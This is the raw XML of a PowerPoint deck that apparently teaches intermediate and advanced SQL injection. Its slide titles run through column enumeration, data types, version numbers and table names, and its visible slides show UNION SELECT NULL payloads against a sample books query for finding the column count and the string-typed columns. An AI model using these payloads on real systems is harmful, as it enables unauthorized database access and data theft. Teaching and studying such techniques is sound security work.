              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Type incompatibility:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="4" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT author, title, year FROM books WHERE title = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1984’ UNION SELECT NULL, NULL, NULL --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’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8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by injecting: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‘ UNION SELECT NULL --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‘ UNION SELECT NULL, NULL --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‘ UNION SELECT NULL, NULL, NULL --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nd so on until one works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then try injecting: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‘ UNION SELECT ‘A’, NULL, NULL --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‘ UNION SELECT NULL, ‘A’, NULL --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‘ UNION SELECT NULL, NULL, ‘A’ --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This will tell you which column is a string data type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319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1021</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>152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$$$$$$\            $$\                                                       $$\ $$\            $$\                       \_$$  _|           $$ |                                                      $$ |\__|           $$ |                        $$ |  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$\  $$$$$$\$$$$\   $$$$$$\   $$$$$$$ |$$\  $$$$$$\ $$$$$$\    $$$$$$\            $$ |  $$  __$$\\_$$  _|  $$  __$$\ $$  __$$\ $$  _$$  _$$\ $$  __$$\ $$  __$$ |$$ | \____$$\\_$$  _|  $$  __$$\           $$ |  $$ |  $$ | $$ |    $$$$$$$$ |$$ |  \__|$$ / $$ / $$ |$$$$$$$$ |$$ /  $$ |$$ | $$$$$$$ | $$ |    $$$$$$$$ |          $$ |  $$ |  $$ | $$ |$$\ $$   ____|$$ |      $$ | $$ | $$ |$$   ____|$$ |  $$ |$$ |$$  __$$ | $$ |$$\ $$   ____|        $$$$$$\ $$ |  $$ | \$$$$  |\$$$$$$$\ $$ |      $$ | $$ | $$ |\$$$$$$$\ \$$$$$$$ |$$ |\$$$$$$$ | \$$$$  |\$$$$$$$\         \______|\__|  \__|  \____/  \_______|\__|      \__| \__| \__| \_______| \_______|\__| \_______|  \____/  \_______|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$$$$$$\   $$$$$$\  $$\             $$$$$$\ $$\   $$\    $$$$$\ $$$$$$$$\  $$$$$$\ $$$$$$$$\ $$$$$$\  $$$$$$\  $$\   $$\  $$  __$$\ $$  __$$\ $$ |            \_$$  _|$$$\  $$ |   \__$$ |$$  _____|$$  __$$\\__$$  __|\_$$  _|$$  __$$\ $$$\  $$ | $$ /  \__|$$ /  $$ |$$ |              $$ |  $$$$\ $$ |      $$ |$$ |      $$ /  \__|  $$ |     $$ |  $$ /  $$ |$$$$\ $$ | \$$$$$$\  $$ |  $$ |$$ |              $$ |  $$ $$\$$ |      $$ |$$$$$\    $$ |        $$ |     $$ |  $$ |  $$ |$$ $$\$$ |  \____$$\ $$ |  $$ |$$ |              $$ |  $$ \$$$$ |$$\   $$ |$$  __|   $$ |        $$ |     $$ |  $$ |  $$ |$$ \$$$$ | $$\   $$ |$$ $$\$$ |$$ |              $$ |  $$ |\$$$ |$$ |  $$ |$$ |      $$ |  $$\   $$ |     $$ |  $$ |  $$ |$$ |\$$$ | \$$$$$$  |\$$$$$$ / $$$$$$$$\       $$$$$$\ $$ | \$$ |\$$$$$$  |$$$$$$$$\ \$$$$$$  |  $$ |   $$$$$$\  $$$$$$  |$$ | \$$ |  \______/  \___$$$\ \________|      \______|\__|  \__| \______/ \________| \______/   \__|   \______| \______/ \__|  \__|                \___|                                                                                                                                                                                                                                 </vt:lpstr>
      <vt:lpstr>Pulling data</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example cont.</vt:lpstr>
      <vt:lpstr>Example cont.</vt:lpstr>
      <vt:lpstr>Length incompatibility</vt:lpstr>
      <vt:lpstr>Type incompatibility</vt:lpstr>
      <vt:lpstr>Magic of Nulls</vt:lpstr>
      <vt:lpstr>Using Nulls</vt:lpstr>
      <vt:lpstr>Figure out data type</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example cont.</vt:lpstr>
      <vt:lpstr>Version number</vt:lpstr>
      <vt:lpstr>Table and column names</vt:lpstr>
      <vt:lpstr>Table and column names cont.</vt:lpstr>
      <vt:lpstr>Restricted characters</vt:lpstr>
      <vt:lpstr>No spaces</vt:lpstr>
      <vt:lpstr>No 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________  ________  ___      ___ ________  ________   ________  _______   ________                                                          |\   __  \|\   ___ \|\  \    /  /|\   __  \|\   ___  \|\   ____\|\  ___ \ |\   ___ \                                                         \ \  \|\  \ \  \_|\ \ \  \  /  / | \  \|\  \ \  \\ \  \ \  \___|\ \   __/|\ \  \_|\ \                                                         \ \   __  \ \  \ \\ \ \  \/  / / \ \   __  \ \  \\ \  \ \  \    \ \  \_|/_\ \  \ \\ \                                                         \ \  \ \  \ \  \_\\ \ \    / /   \ \  \ \  \ \  \\ \  \ \  \____\ \  \_|\ \ \  \_\\ \                                                         \ \__\ \__\ \_______\ \__/ /     \ \__\ \__\ \__\\ \__\ \_______\ \_______\ \_______\                                                         \|__|\|__|\|_______|\|__|/       \|__|\|__|\|__| \|__|\|_______|\|_______|\|_______|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________  ________  ___               ___  ________         ___  _______   ________ _________  ___  ________  ________       |\   ____\|\   __  \|\  \             |\  \|\   ___  \      |\  \|\  ___ \ |\   ____\\___   ___\\  \|\   __  \|\   ___  \     \ \  \___|\ \  \|\  \ \  \            \ \  \ \  \\ \  \     \ \  \ \   __/|\ \  \___\|___ \  \_\ \  \ \  \|\  \ \  \\ \  \     \ \_____  \ \  \\\  \ \  \            \ \  \ \  \\ \  \  __ \ \  \ \  \_|/_\ \  \       \ \  \ \ \  \ \  \\\  \ \  \\ \  \     \|____|\  \ \  \\\  \ \  \____        \ \  \ \  \\ \  \|\  \\_\  \ \  \_|\ \ \  \____   \ \  \ \ \  \ \  \\\  \ \  \\ \  \      ____\_\  \ \_____  \ \_______\       \ \__\ \__\\ \__\ \________\ \_______\ \_______\  \ \__\ \ \__\ \_______\ \__\\ \__\    |\_________\|___| \__\|_______|        \|__|\|__| \|__|\|________|\|_______|\|_______|   \|__|  \|__|\|_______|\|__| \|__|    \|_________|     \|__|                                                                                                      </dc:title>
  <dc:creator>asdf</dc:creator>
  <cp:lastModifiedBy>_</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-24T19:41:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-28T17:33:57Z</dcterms:modified>
</cp:coreProperties>
</file>